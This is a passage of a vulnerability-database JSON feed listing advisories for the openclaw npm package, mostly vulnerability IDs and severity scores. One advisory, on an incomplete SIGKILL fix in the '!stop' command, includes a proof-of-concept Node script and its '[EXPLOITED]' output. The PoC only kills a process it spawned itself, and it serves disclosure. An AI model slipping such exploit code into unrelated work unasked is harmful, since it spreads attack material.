qhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-jp4j-q5fc-58gv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-csnc-r6fv-j3en"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90131?format=json","vulnerability_id":"VCID-cvmw-sxfq-dyhz","summary":"OpenClaw: Pairing pending-request caps were enforced per channel instead of per account\n## Summary\n\nBefore OpenClaw 2026.3.31, pending pairing-request caps were enforced per channel file instead of per account. On multi-account channel setups, requests from other accounts could fill the shared pending window and block new pairing challenges on an unaffected account.\n\n## Impact\n\nThis issue could deny new pairing or onboarding on another account until an existing request was approved or expired. It was an availability-only bug; it did not allow cross-account approval, data access, or authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `>= 2026.2.26, < 2026.3.31`\n- Patched versions: `>= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9bc1f896c8cd325dd4761681e9bdb8c425f69785` — scope pending request caps per account\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41346","reference_id":"","reference_type":"","scores":[{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37899","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.3787","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37901","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41346"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9bc1f896c8cd325dd4761681e9bdb8c425f69785"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wwfp-w96m-c6x8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41346","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41346"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:38:52Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-improper-pending-pairing-request-cap-enforcement"},{"reference_url":"https://github.com/advisories/GHSA-wwfp-w96m-c6x8","reference_id":"GHSA-wwfp-w96m-c6x8","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wwfp-w96m-c6x8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41346","GHSA-wwfp-w96m-c6x8"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cvmw-sxfq-dyhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90875?format=json","vulnerability_id":"VCID-cvxu-rdbu-abd2","summary":"OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Advisory Details\n**Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts`\n\n**Description**:\n### Summary\nThe `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than from the patched `src/process/kill-tree.ts`.\n\n### Details\nCVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive.\n\nHowever, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`:\n\n```typescript\n// src/agents/shell-utils.ts:170-192\nexport function killProcessTree(pid: number): void {\n  // ... Windows handling ...\n  try {\n    process.kill(-pid, \"SIGKILL\"); // Immediate hard kill, no SIGTERM\n  } catch {\n    try {\n      process.kill(pid, \"SIGKILL\");\n    } catch {\n      // process already dead\n    }\n  }\n}\n```\n\nThe `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302:\n\n```typescript\n// src/auto-reply/reply/bash-command.ts:5\nimport { killProcessTree } from \"../../agents/shell-utils.js\";\n\n// src/auto-reply/reply/bash-command.ts:300-304\nconst pid = running.pid ?? running.child?.pid;\nif (pid) {\n  killProcessTree(pid);  // Calls the UNPATCHED version\n}\nmarkExited(running, null, \"SIGKILL\", \"failed\");\n```\n\nCompare this to the patched version in `src/process/kill-tree.ts`:\n\n```typescript\n// src/process/kill-tree.ts:46-78\nfunction killProcessTreeUnix(pid: number, graceMs: number): void {\n  // Step 1: Try graceful SIGTERM to process group\n  try {\n    process.kill(-pid, \"SIGTERM\");\n  } catch { /* ... */ }\n\n  // Step 2: Wait grace period, then SIGKILL if still alive\n  setTimeout(() => {\n    if (isProcessAlive(-pid)) {\n      try { process.kill(-pid, \"SIGKILL\"); } catch { /* ... */ }\n    }\n  }, graceMs).unref();\n}\n```\n\n### PoC\n\nThis PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container.\n\n**Setup:**\n```bash\n# Build and start the gateway container\ncd CVE-2026-27486-variant-exp/\ndocker compose up -d\nsleep 5\n```\n\n**Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):**\n\nThe following script is injected into the container and executed. It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`:\n\n```javascript\n// exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190\nconst { spawn } = require('child_process');\nconst fs = require('fs');\n\ntry { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {}\n\nconst child = spawn('/bin/bash', ['-c',\n  'trap \\'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\\' SIGTERM; while true; do sleep 1; done'\n], { detached: true, stdio: 'ignore' });\nchild.unref();\n\nsetTimeout(() => {\n  // VULNERABLE: same as shell-utils.ts — SIGKILL only\n  try { process.kill(-child.pid, 'SIGKILL'); } catch {\n    try { process.kill(child.pid, 'SIGKILL'); } catch {}\n  }\n  setTimeout(() => {\n    if (fs.existsSync('/tmp/graceful_shutdown.txt')) {\n      console.log('[BLOCKED] SIGTERM was received.');\n      process.exit(1);\n    } else {\n      console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.');\n      process.exit(0);\n    }\n  }, 2000);\n}, 1000);\n```\n\n**Run:**\n```bash\npython3 poc_exploit.py\n```\n\n### Log of Evidence\n\n**Exploit output (SIGKILL only, no graceful shutdown):**\n```\n[*] Running exploit (vulnerable killProcessTree from shell-utils.ts)...\n[*] Victim PID: 78\n[*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)...\n[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.\n[EXPLOITED] Graceful shutdown handler was NEVER invoked.\n\n[SUCCESS] CVE-2026-27486 variant confirmed:\n  killProcessTree() in shell-utils.ts sends immediate SIGKILL,\n  bypassing the graceful shutdown fix in process/kill-tree.ts.\n```\n\n**Control output (SIGTERM first, graceful shutdown works):**\n```\n[*] Running control (patched killProcessTree from process/kill-tree.ts)...\n[*] Victim PID: 93\n[*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)...\n[NORMAL] SIGTERM received — graceful shutdown completed. Flag: GRACEFUL_SHUTDOWN\n\n[NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first,\n         allowing graceful shutdown before escalating to SIGKILL.\n```\n\n### Impact\nWhen `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in:\n\n- **Data corruption**: processes writing to files or databases are interrupted mid-write\n- **Resource leaks**: temporary files, lock files, and network connections are not properly released\n- **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed\n\nThis is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.3.14\n- **Patched versions**: <None>\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\n\n### Weaknesses\n- **CWE**: CWE-404: Improper Resource Shutdown or Release\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. |\n| [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). |","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35667","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04185","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04174","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35667"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35667","reference_id":"CVE-2026-35667","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35667"},{"reference_url":"https://github.com/advisories/GHSA-3298-56p6-rpw2","reference_id":"GHSA-3298-56p6-rpw2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3298-56p6-rpw2"},{"reference_url":"https://github.com/advisories/GHSA-jfv4-h8mc-jcp8","reference_id":"GHSA-jfv4-h8mc-jcp8","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jfv4-h8mc-jcp8"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts","reference_id":"openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T20:14:31Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-w